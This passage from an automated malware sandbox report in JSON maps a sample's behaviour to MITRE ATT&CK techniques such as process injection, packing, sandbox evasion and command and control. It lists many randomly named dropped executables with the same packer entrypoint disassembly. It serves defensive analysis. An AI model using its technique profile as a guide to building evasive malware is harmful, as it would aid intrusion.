"Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 6}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"088822.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"xvndjvv.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"60884.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"ldrttb.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rfhlpxb.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"8668622.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"68646.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"6844880.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"ljvbrr.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rxvjbx.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"frbnhn.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"dthhtb.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"hxpnnf.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rtdhhn.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rjtxj.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"60024.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"0642260.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"8402600.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"tfftdr.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"tjbljn.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"xdnld.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"vfdlx.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rjlbb.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"ftnpjx.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"088822.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"xvndjvv.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"60884.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"ldrttb.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rfhlpxb.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"8668622.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"68646.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"6844880.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"ljvbrr.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rxvjbx.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"frbnhn.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"dthhtb.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"hxpnnf.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rtdhhn.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rjtxj.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"60024.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"0642260.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"8402600.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"tfftdr.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"tjbljn.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"xdnld.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"vfdlx.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rjlbb.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"ftnpjx.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 704c0000\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"dd73d1627ecfbb1ff2ccf3638564b33cac9d938c9504b0eb810f5063ea2531c9.exe\" loaded module \"KERNEL32\" at base 76a90000\n 